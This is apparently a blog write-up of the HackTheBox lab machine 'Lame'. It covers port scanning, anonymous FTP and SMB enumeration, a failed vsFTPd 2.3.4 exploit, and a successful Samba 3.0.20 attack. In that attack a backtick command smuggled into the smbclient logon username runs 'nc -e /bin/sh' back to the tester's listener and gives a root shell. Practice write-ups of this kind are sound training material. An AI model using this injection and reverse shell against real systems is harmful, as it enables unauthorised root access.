Lame

#Linux #Enumeration #FTP #SMB

Lame is an easy-rated Linux machine from HackTheBox created by ch4p. There is no mystery on this machine, which makes it suitable for practice: you find a service, then search for its exploit. In this post, my IP is 10.10.14.49 and the target's IP is 10.129.223.149.

Gather Information

Local Terminal
nmap -p- --open -T5 -v -n 10.129.223.149 -oG AllPorts
From here, we have FTP, SMB and the NetBIOS Session Service, and nothing that looks like a website.
Local Terminal
nmap -sCV -p 21,22,139,445,3632 10.129.223.149 -oN Target

Port 21 allows anonymous login and the banner includes the version, vsFTPd 2.3.4, perfect, we will search for that. Port 139 is another SMB service, but from a different workgroup.

Local Terminal
ftp 10.129.223.149    # user: anonymous, pass: anonymous
Hey, there is nothing inside!
Local Terminal
crackmapexec smb 10.129.223.149
smbmap -H 10.129.223.149
Look! The tmp share is accessible, we should use that.
Local Terminal
smbclient -L 10.129.223.149 -N
Fail, but this is a client-side error.
Local Terminal
smbclient //10.129.223.149/tmp -N

And we can't log in with a null session?

Exploitation

At this point we have the following information: port 21 FTP (vsFTPd 2.3.4), port 139 SMB (unknown version) and port 445 SMB (3.0.20).

  • Search: vsFTPd 2.3.4 exploit

Local Terminal
git clone https://github.com/ahervias77/vsftpd-2.3.4-exploit
cd vsftpd-2.3.4-exploit
batcat vsftpd_234_exploit.py
So, those are the instructions.
Local Terminal
python3 vsftpd_234_exploit.py 10.129.223.149 21 whoami
It doesn't work; let's try another way.

At https://www.exploit-db.com/ search for Samba 3.0.20 (Windows issue), and download the exploit from https://www.exploit-db.com/exploits/16320

Local Terminal
batcat 16320.rb
The exploit only connects to SMB and uses a long string as the username, and we know that the SMB service has an unknown version.
As we can see, the payload is a terminal command, so maybe we can change that part to create a reverse shell.
Local Terminal [A]
nc -nlvp 443
Local Terminal [B]
smbclient //10.129.223.149/tmp -N --option='client min protocol=NT1'
logon "/=`nohup nc -e /bin/sh 10.10.14.49 443 `"
Now Terminal [A] has a root shell on the target [Root].

As you can see, we are connected as root, so we can get both flags directly.

Target Terminal [Root]
script /dev/null -c bash
cat /home/makis/user.txt
cat /root/root.txt
